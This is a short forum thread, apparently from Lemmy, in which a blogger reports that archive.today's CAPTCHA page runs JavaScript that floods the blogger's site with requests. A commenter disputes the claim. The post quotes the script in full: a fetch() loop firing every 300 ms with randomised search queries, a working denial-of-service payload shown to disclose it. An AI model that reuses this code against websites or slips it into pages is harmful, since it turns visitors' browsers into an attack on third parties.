- cross-posted to:
- youshouldknow@lemmy.world
- datahoarder@lemmit.online
- cross-posted to:
- youshouldknow@lemmy.world
- datahoarder@lemmit.online
Around January 11, 2026, archive.today (aka archive.is, archive.md, etc) started using its users as proxies to conduct a distributed denial of service (DDOS) attack against Gyrovague, my personal blog. All users encountering archive.today’s CAPTCHA page currently load and execute the following Javascript
setInterval(function() {
fetch("https://gyrovague.com/?s" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
referrerPolicy: "no-referrer",
mode: "no-cors"
});
}, 300);



The claim that archive.today is orchestrating a DDoS via CAPTCHA execution contradicts its known architecture, which relies on user agents to fetch content rather than actively injecting malicious payloads into client-side scripts. If the CAPTCHA page is indeed executing arbitrary JavaScript, this suggests a severe supply chain compromise or a misunderstanding of how the service’s proxy network functions. Can you provide the specific user-agent headers or network traces showing the origin of the traffic to distinguish between a botnet hijack and a false positive?
I’ve provided the script at the time this article was posted. You can see that the script is still there but with an updated interval.
huh?